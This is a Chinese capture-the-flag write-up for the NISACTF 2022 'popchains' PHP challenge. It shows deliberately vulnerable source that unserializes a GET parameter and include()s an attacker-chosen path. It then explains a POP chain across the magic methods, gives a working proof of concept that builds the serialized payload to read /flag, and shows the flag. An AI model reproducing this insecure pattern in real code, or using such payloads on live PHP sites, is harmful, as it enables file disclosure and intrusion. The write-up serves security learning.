题目源码

Happy New Year~ MAKE A WISH

<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){

    @unserialize($_GET['wish']);

}

else{

    $a=new Road_is_Long;

    highlight_file(__FILE__);

}

/***************************pop your 2022*****************************/

class Road_is_Long{

    public $page;

    public $string;

    public function __construct($file='index.php'){

        $this->page = $file;

    }

    public function __toString(){

        return $this->string->page;

    }

    public function __wakeup(){

        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {

            echo "You can Not Enter 2022";

            $this->page = "index.php";

        }

    }

}

class Try_Work_Hard{

    protected  $var;

    public function append($value){

        include($value);

    }

    public function __invoke(){

        $this->append($this->var);

    }

}

class Make_a_Change{

    public $effort;

    public function __construct(){

        $this->effort = array();

    }

    public function __get($key){

        $function = $this->effort;

        return $function();

    }

}

/**********************Try to See flag.php*****************************/

解题思路

Road_is_Long类中,__toString()在该类被当作字符串处理的时候执行,__wakeup()方法下的preg_match()将$page变量当作字符串处理。如果我们把类中的 $page 赋值为此类本身,则当其触发__wakeup() 方法后,触发__toString()。而unserialize()会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup()方法,所以当我们利用该类构造的序列化数据传入时,此类下的__wakeup() 方法就会调用。

然而触发__toString()下的$this->string->page该如何利用?

看Make_a_Change类下,有一个__get()方法,当访该类中私有或者不存在的成员属性值时调用。而Make_a_Change类中没有$page变量,则将Road_is_Long类中的$string赋值为Make_a_Change类,可以触发__get()方法。此__get()将$effort当作函数执行,并返回。

再来看Try_Work_Hard类,其__invoke()方法,在把该类当作函数执行时调用。__invoke()下的append()就是使用include()包含一个目标。因此将Make_a_Change类中的$effort赋值为Try_Work_Hard类,再将Try_Work_Hard类中的$var赋值为/flag


整体思路

Road_is_Long  __wakeup()   -->   Road_is_Long __toString()   -->   Make_a_Change __get()

  -->   Try_Work_Hard

代码实现反推

$a=new Road_is_Long();

$a->page=new Road_is_Long();

$a->page->string=new Make_a_Change();

$a->page->string->effort=new Try_Work_Hard();

echo urlencode(serialize($a));

POC

<?php

class Road_is_Long{

    public $page;

    public $string;

}

class Try_Work_Hard{

    protected  $var="/flag";

}

class Make_a_Change{

    public $effort;

}

$a=new Road_is_Long();

$a->page=new Road_is_Long();

$a->page->string=new Make_a_Change();

$a->page->string->effort=new Try_Work_Hard();

echo urlencode(serialize($a));

?>

传参得到flag

NSSCTF{5a7a2d51-9b77-465b-820c-d7f84750140c}

[NISACTF 2022]popchains的更多相关文章

  1. web安全学习笔记(2022/8/26)

    网络安全Web学习笔记 @author: lamaper @email: lamaper@qq.com @blog: lamaper - 博客园 (cnblogs.com) @date: Aug.26 ...

  2. CJOJ 2022 【一本通】简单的背包问题(搜索)

    CJOJ 2022 [一本通]简单的背包问题(搜索) Description 设有一个背包可以放入的物品重量为S,现有n件物品,重量分别是w1,w2,w3,-wn. 问能否从这n件物品中选择若干件放入 ...

  3. HDU 2022 海选女主角

    http://acm.hdu.edu.cn/showproblem.php?pid=2022 Problem Description potato老师虽然很喜欢教书,但是迫于生活压力,不得不想办法在业 ...

  4. ural 2022 Riding a Toad

    2022. Riding a Toad Time limit: 1.0 secondMemory limit: 64 MB A tribe of leafmen live in the old for ...

  5. [LOJ 2022]「AHOI / HNOI2017」队长快跑

    [LOJ 2022]「AHOI / HNOI2017」队长快跑 链接 链接 题解 不难看出,除了影响到起点和终点的射线以外,射线的角度没有意义,因为如果一定要从该射线的射出一侧过去,必然会撞到射线 因 ...

  6. [翻译]正式宣布 Visual Studio 2022

    原文: [Visual Studio 2022] 首先,我们要感谢正在阅读这篇文章的你,我们所有的产品开发都始于你也止于你,无论你是在开发者社区上发帖,还是填写了调查问卷,还是向我们发送了反馈意见,或 ...

  7. 它来了!!!有史以来第一个64位Visual Studio(2022)预览版将在今夏发布!

    美国时间2021年4月19日,微软产品研发部一位负责人Amanda Silver在其博客上发布一则<Visual Studio 2022>的消息,表示将在今年(2021年)夏天发布Visu ...

  8. .NET6系列:微软正式宣布Visual Studio 2022

    系列目录     [已更新最新开发文章,点击查看详细] 首先,我们要感谢正在阅读这篇文章的你,我们所有的产品开发都始于你也止于你,无论你是在开发者社区上发帖,还是填写了调查问卷,还是向我们发送了反馈意 ...

  9. .NET6系列:Visual Studio 2022 线路图

    系列目录     [已更新最新开发文章,点击查看详细] 在上一篇博客<Visual Studio 2022>中介绍了VS2022的性能改进与重要功能.本文主要介绍在 Visual Stud ...

  10. 微软发布了Visual Studio 2022 Preview 1 以及.NET 6 Preview 5

    Microsoft 今天宣布了Visual Studio 2022 的第一个预览版,并且同时也发布了.NET 6 Preview 5. https://devblogs.microsoft.com/v ...

随机推荐

  1. SpringBoot中的拦截器江湖

    前言 很多小伙伴在工作中遇到拦截需求就无脑写HandlerInterceptor,结果被复杂场景搞得鼻青脸肿. 作为一名有多年开发经验的程序员,今天领大家到SpringBoot的山头认认6把交椅: 这 ...

  2. P1758 [NOI2009] 管道取珠 题解

    题意: 有点复杂,看 原题面 吧. 思路 发现可以等价为两个人独立操作操作出来的序列相同的方案数. 然后发现复杂度阈值可以接受 \(n^3\),因此直接套路地设 \(f_{t,i,j}\) 表示两个人 ...

  3. Python基础 - 多进程(上)

    估计很多小伙伴会认为, 类似, 进程, 线程, 协程等这些, 比较专业的词汇, 应该是比较高深的内容, 作为入门基础不太合适. 而, 事实确实如此. 但, 如果不是做研究的, 仅从功能的视角看看待, ...

  4. C#LINQ去掉数组字符串中的指定元素

    例字符串: string s1 = "111,111,111222111,111333111,111"; string del = "111"; 要删除指定元素 ...

  5. MySQL 添加和删除索引

    摘要:介绍添加.删除和显示索引的方法.   今天为大家演示MySQL数据库索引的常见操作,包括创建.删除和查询等.下面首先介绍为什么需要添加索引. 索引的作用   索引用于快速找出在某一列中有一特定值 ...

  6. http协议中长连接和短连接介绍

      TCP连接 当网络通信时采用TCP协议时,在真正的读写操作之前,客户端与服务器端之间必须建立一个连接,当读写操作完成后,双方不再需要这个连接时可以释放这个连接.连接的建立依靠"三次握手& ...

  7. java 腾讯云、阿里云SMS短信工具类

    引入POM依赖 <!-- 腾讯云SMS SDK --> <dependency> <groupId>com.tencentcloudapi</groupId& ...

  8. 洛谷P4643 [国家集训队]阿狸和桃子的游戏 & 初赛心情

    洛谷P4643 [国家集训队]阿狸和桃子的游戏 引入 其实是道小水题,没有那么多的数据结构和卡常.但是我就是喜欢这种题!giao! (希望这道题不要变色啊--这可是我a的第一道黑题啊啊啊-- 蒟蒻的心 ...

  9. 总决赛定档!“天翼云息壤杯”高校AI大赛巅峰之战即将打响!

    近日,为梦想添翼,让AI发光--"天翼云息壤杯"高校AI大赛总决赛时间正式揭晓.总决赛将于2025年7月1日至7月17日在北京举办.届时,来自全国各地上百支成功晋级的优秀队伍和特邀 ...

  10. Kubernetes中的多租户

    多租户 多租户集群由多个用户和/或工作负载共享,这些用户和/或工作负载被称为"租户".多租户集群的运营方必须将租户彼此隔离,以最大限度地减少被盗用的租户或恶意租户可能对集群和其他租 ...